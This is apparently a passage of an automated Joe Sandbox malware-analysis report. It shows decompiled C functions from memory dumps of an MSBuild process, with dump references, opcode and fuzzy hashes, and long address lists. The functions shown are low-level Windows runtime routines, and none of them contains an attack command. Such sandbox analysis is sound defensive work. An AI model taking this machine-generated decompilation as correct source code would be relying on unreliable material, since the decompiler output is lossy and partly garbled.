                                                                                                0x010cc26c
                                                                                                0x010cc26c
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                                • Instruction ID: 9d3c5ef79bb88f5fa3d80bc2cb758c4cfd64c0ea2f827d09c179339ac55247ba
                                                                                                • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                                                • Instruction Fuzzy Hash: FA313772A01547BEE709EBB8C980BEDFBA5BF52604F14415ED49C47201DB346A05CFE1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01127016 Relevance: .1, Instructions: 104COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 76%
                                                                                                			E01127016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x119d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E01126B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E01126B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E010C7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E010E9AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E010EB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L010C4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                                                                                0x01127016
                                                                                                0x0112701e
                                                                                                0x0112702b
                                                                                                0x01127033
                                                                                                0x01127037
                                                                                                0x0112703c
                                                                                                0x0112703e
                                                                                                0x01127041
                                                                                                0x01127045
                                                                                                0x0112704a
                                                                                                0x01127050
                                                                                                0x01127055
                                                                                                0x0112705a
                                                                                                0x01127062
                                                                                                0x01127062
                                                                                                0x0112705a
                                                                                                0x01127064
                                                                                                0x01127064
                                                                                                0x01127067
                                                                                                0x01127071
                                                                                                0x01127096
                                                                                                0x0112709b
                                                                                                0x011270a2
                                                                                                0x011270a6
                                                                                                0x011270a7
                                                                                                0x011270ad
                                                                                                0x011270b3
                                                                                                0x011270b6
                                                                                                0x011270bb
                                                                                                0x011270c3
                                                                                                0x011270c3
                                                                                                0x011270c6
                                                                                                0x011270cd
                                                                                                0x011270dd
                                                                                                0x011270e0
                                                                                                0x011270e2
                                                                                                0x011270e2
                                                                                                0x011270ee
                                                                                                0x01127101
                                                                                                0x011270f0
                                                                                                0x011270f9
                                                                                                0x011270f9
                                                                                                0x0112710a
                                                                                                0x0112710e
                                                                                                0x01127112
                                                                                                0x01127117
                                                                                                0x01127118
                                                                                                0x01127118
                                                                                                0x011270bb
                                                                                                0x0112711d
                                                                                                0x01127123
                                                                                                0x01127131
                                                                                                0x01127131
                                                                                                0x01127136
                                                                                                0x0112713d
                                                                                                0x0112713e
                                                                                                0x0112713f
                                                                                                0x0112714a
                                                                                                0x0112714a
                                                                                                0x01127084
                                                                                                0x01127088
                                                                                                0x00000000
                                                                                                0x0112708e
                                                                                                0x0112708e
                                                                                                0x01127092
                                                                                                0x00000000
                                                                                                0x01127092

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a740b46e92b0accec0217fa48546b5798ea82ba1dac68263da016e0d212ce15c
                                                                                                • Instruction ID: ff0e21f7f0d55355a7ffd87ee10116a8b65a126ed232e4147c831e79083c239e
                                                                                                • Opcode Fuzzy Hash: a740b46e92b0accec0217fa48546b5798ea82ba1dac68263da016e0d212ce15c
                                                                                                • Instruction Fuzzy Hash: 4531E4726047619FC324DF68C840AABB7E5FF98700F144A2DF995876D0E730E914CBA6
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010DA70E Relevance: .1, Instructions: 96COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 92%
                                                                                                			E010DA70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x1197b10; // 0x0
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x1197b10 = 8;
					 *0x1197b14 = 0x1197b0c;
					 *0x1197b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x1
					E010DA990(0x1197b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L010DA840(__edx, __ecx, __ecx, _t52, 0x1197b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x1197b10; // 0x0
					_t3 = _t37 + 0x27; // 0x27
					__eflags = _t3 >> 5 -  *0x1197b18; // 0x0
					if(__eflags > 0) {
						_t38 =  *0x1197b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x27
						_v8 = _t4 >> 5;
						_t50 = L010C4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x1197b18 = _v8;
						_t8 = _t52 + 7; // 0x7
						E010EF3E0(_t50,  *0x1197b14, _t8 >> 3);
						_t28 =  *0x1197b14; // 0x0
						__eflags = _t28 - 0x1197b0c;
						if(_t28 != 0x1197b0c) {
							L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x8
						 *0x1197b14 = _t50;
						_t48 = _v12;
						 *0x1197b10 = _t9;
						goto L6;
					}
					 *0x1197b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                                                                                0x010da713
                                                                                                0x010da714
                                                                                                0x010da717
                                                                                                0x010da71d
                                                                                                0x010da720
                                                                                                0x010da722
                                                                                                0x010da727
                                                                                                0x010da74a
                                                                                                0x010da754
                                                                                                0x010da75e
                                                                                                0x010da768
                                                                                                0x010da76a
                                                                                                0x010da773
                                                                                                0x010da78b
                                                                                                0x010da790
                                                                                                0x010da792
                                                                                                0x010da741
                                                                                                0x010da741
                                                                                                0x010da743
                                                                                                0x010da749
                                                                                                0x010da749
                                                                                                0x010da732
                                                                                                0x010da73a
                                                                                                0x010da797
                                                                                                0x010da79d
                                                                                                0x010da7a3
                                                                                                0x010da7a9
                                                                                                0x010da7b6
                                                                                                0x010da7bc
                                                                                                0x010da7ca
                                                                                                0x010da7e0
                                                                                                0x010da7e2
                                                                                                0x010da7e4
                                                                                                0x01119bf2
                                                                                                0x00000000
                                                                                                0x01119bf2
                                                                                                0x010da7ed
                                                                                                0x010da7f2
                                                                                                0x010da800
                                                                                                0x010da805
                                                                                                0x010da80d
                                                                                                0x010da812
                                                                                                0x01119c08
                                                                                                0x01119c08
                                                                                                0x010da818
                                                                                                0x010da81b
                                                                                                0x010da821
                                                                                                0x010da824
                                                                                                0x00000000
                                                                                                0x010da824
                                                                                                0x010da7ae
                                                                                                0x00000000
                                                                                                0x010da7ae
                                                                                                0x010da73c
                                                                                                0x010da73e
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 35ecfd8a70f5b2b86714020385aa04fd2f24700f73a1adc654c4b33a19c93c2c
                                                                                                • Instruction ID: f7439a7654259fe2215e52cd3fe6d2c270ab497c1a99ba184d8c9b30060ca07b
                                                                                                • Opcode Fuzzy Hash: 35ecfd8a70f5b2b86714020385aa04fd2f24700f73a1adc654c4b33a19c93c2c
                                                                                                • Instruction Fuzzy Hash: E731CEB1724205DBC729CB18EC80F69BBF9FF89710F15496AE27687284D3B09981CF91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010D61A0 Relevance: .1, Instructions: 93COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 97%
                                                                                                			E010D61A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E010D5E50(0x10867cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E01179D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E010AF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                                                                                0x010d61b3
                                                                                                0x010d61b5
                                                                                                0x010d61bd
                                                                                                0x010d61c3
                                                                                                0x010d61c7
                                                                                                0x010d61d2
                                                                                                0x010d61ff
                                                                                                0x010d61ff
                                                                                                0x010d6201
                                                                                                0x010d6207
                                                                                                0x010d6207
                                                                                                0x010d61d4
                                                                                                0x010d61d9
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010d61df
                                                                                                0x010d61e2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010d61e6
                                                                                                0x010d61e8
                                                                                                0x010d61ee
                                                                                                0x010d61ee
                                                                                                0x010d61f9
                                                                                                0x0111762f
                                                                                                0x01117632
                                                                                                0x01117635
                                                                                                0x01117639
                                                                                                0x01117640
                                                                                                0x0111766e
                                                                                                0x01117675
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x01117681
                                                                                                0x01117689
                                                                                                0x0111768d
                                                                                                0x01117691
                                                                                                0x01117695
                                                                                                0x01117699
                                                                                                0x011176af
                                                                                                0x011176b5
                                                                                                0x011176b7
                                                                                                0x011176b7
                                                                                                0x011176d7
                                                                                                0x011176dc
                                                                                                0x00000000
                                                                                                0x011176dc
                                                                                                0x011176a2
                                                                                                0x011176a9
                                                                                                0x01117651
                                                                                                0x01117653
                                                                                                0x01117653
                                                                                                0x01117656
                                                                                                0x01117656
                                                                                                0x00000000
                                                                                                0x01117656
                                                                                                0x01117644
                                                                                                0x01117646
                                                                                                0x01117648
                                                                                                0x01117648
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 73f5644060e04c65c5d3382147be46e05c8c808945b02874c0b4c9b41129778e
                                                                                                • Instruction ID: 8530dbe50520632082589635d2122a9df68256a27fd53fba6af7e7e81602257f
                                                                                                • Opcode Fuzzy Hash: 73f5644060e04c65c5d3382147be46e05c8c808945b02874c0b4c9b41129778e
                                                                                                • Instruction Fuzzy Hash: 2D3159726097018FE364DF1DC800B2AFBE5BB88B00F09496DE9949B395E771D844CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010AAA16 Relevance: .1, Instructions: 93COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 95%
                                                                                                			E010AAA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x119d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x1197b9c; // 0x0
					_t53 = L010C4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E010EB640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E010EF3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L010B6C59(_t53, _t51, _t58) != 0) {
							_t28 = E010D5E50(0x108c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E010DB230(_v32, _v28, 0x108c2d8, 1,  &_v24);
								_t28 = E010AF7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                                                                                0x010aaa25
                                                                                                0x010aaa29
                                                                                                0x010aaa2d
                                                                                                0x010aaa30
                                                                                                0x010aaa37
                                                                                                0x010aaa3c
                                                                                                0x01104458
                                                                                                0x01104458
                                                                                                0x01104472
                                                                                                0x01104474
                                                                                                0x01104476
                                                                                                0x010aaa64
                                                                                                0x010aaa74
                                                                                                0x0110447c
                                                                                                0x01104483
                                                                                                0x01104492
                                                                                                0x010aaa52
                                                                                                0x010aaa54
                                                                                                0x010aaa5e
                                                                                                0x011044a8
                                                                                                0x011044ad
                                                                                                0x011044af
                                                                                                0x011044b6
                                                                                                0x011044b6
                                                                                                0x011044b9
                                                                                                0x011044bc
                                                                                                0x011044cd
                                                                                                0x011044d3
                                                                                                0x011044d6
                                                                                                0x011044e1
                                                                                                0x011044e1
                                                                                                0x011044e6
                                                                                                0x011044e8
                                                                                                0x011044fb
                                                                                                0x011044fb
                                                                                                0x011044e8
                                                                                                0x00000000
                                                                                                0x010aaa5e
                                                                                                0x01104476
                                                                                                0x010aaa42
                                                                                                0x010aaa46
                                                                                                0x010aaa48
                                                                                                0x010aaa4c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 94c03110d330db667e98a1e452f2ddf8c115d79fb89204af428e772fc7b00e3f
                                                                                                • Instruction ID: ba03c73ae616742e0ea09b25d349f9166eaf3b1143e91403b9329d5fcb262907
                                                                                                • Opcode Fuzzy Hash: 94c03110d330db667e98a1e452f2ddf8c115d79fb89204af428e772fc7b00e3f
                                                                                                • Instruction Fuzzy Hash: EB31C571A0021AEBDF15AFA9CD81ABFB7B8FF14700B454069F991D7280E7749D51CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010E8EC7 Relevance: .1, Instructions: 92COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 93%
                                                                                                			E010E8EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x119d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E010D4E70(0x11986e4, 0x10e9490, 0, 0);
					if( *0x11953e8 > 5 && E010E8F33(0x11953e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x11953e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x11953e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x108bc46;
						_t48 = E01127B9C(0x11953e8, 0x108bc46, _t67, 0x11953e8, _t70,  &_v140);
					}
				}
				return E010EB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                                                                                                0x010e8ec7
                                                                                                0x010e8ed9
                                                                                                0x010e8edc
                                                                                                0x010e8ee6
                                                                                                0x010e8ee9
                                                                                                0x010e8eee
                                                                                                0x010e8efc
                                                                                                0x010e8f08
                                                                                                0x01121349
                                                                                                0x01121353
                                                                                                0x0112135d
                                                                                                0x01121366
                                                                                                0x0112136f
                                                                                                0x01121375
                                                                                                0x0112137c
                                                                                                0x01121385
                                                                                                0x01121390
                                                                                                0x01121391
                                                                                                0x0112139c
                                                                                                0x0112139d
                                                                                                0x011213a6
                                                                                                0x011213ac
                                                                                                0x011213b2
                                                                                                0x011213b5
                                                                                                0x011213bc
                                                                                                0x011213bf
                                                                                                0x011213c2
                                                                                                0x011213c5
                                                                                                0x011213c8
                                                                                                0x011213cb
                                                                                                0x011213ce
                                                                                                0x011213d1
                                                                                                0x011213d4
                                                                                                0x011213d7
                                                                                                0x011213da
                                                                                                0x011213dd
                                                                                                0x011213e0
                                                                                                0x011213e3
                                                                                                0x011213e6
                                                                                                0x011213e9
                                                                                                0x011213f6
                                                                                                0x01121400
                                                                                                0x01121400
                                                                                                0x010e8f08
                                                                                                0x010e8f32

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e087c7596e8bb3c489c0d7013e8181ee7bdae36fb2aa3374aaa85507d777e4fc
                                                                                                • Instruction ID: a879adf8d6188c64cca3ce3324936bff7d24c0465b94de4e9fba9f9982d9b24a
                                                                                                • Opcode Fuzzy Hash: e087c7596e8bb3c489c0d7013e8181ee7bdae36fb2aa3374aaa85507d777e4fc
                                                                                                • Instruction Fuzzy Hash: DE4190B1D002189FDB24CFAAD981AADFBF5FB48710F5081AEE559A7240D7705A84CF50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010DE730 Relevance: .1, Instructions: 89COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 74%
                                                                                                			E010DE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E010E9670() < 0) {
					E010FDF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x1197b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L010C4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M010DE810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

















                                                                                                0x010de730
                                                                                                0x010de736
                                                                                                0x010de738
                                                                                                0x010de73d
                                                                                                0x010de73e
                                                                                                0x010de740
                                                                                                0x010de749
                                                                                                0x010de765
                                                                                                0x010de76a
                                                                                                0x010de76b
                                                                                                0x010de76c
                                                                                                0x010de76d
                                                                                                0x010de76e
                                                                                                0x010de76f
                                                                                                0x010de775
                                                                                                0x010de777
                                                                                                0x010de77e
                                                                                                0x0111b675
                                                                                                0x010de784
                                                                                                0x010de784
                                                                                                0x010de789
                                                                                                0x010de7a8
                                                                                                0x010de7ac
                                                                                                0x010de807
                                                                                                0x010de7ae
                                                                                                0x010de7ae
                                                                                                0x010de7b1
                                                                                                0x010de7b4
                                                                                                0x010de7b9
                                                                                                0x010de7c0
                                                                                                0x010de7c4
                                                                                                0x010de7ca
                                                                                                0x010de7cc
                                                                                                0x00000000
                                                                                                0x010de7d3
                                                                                                0x010de7d6
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010de7ff
                                                                                                0x010de802
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010de7f9
                                                                                                0x010de7fc
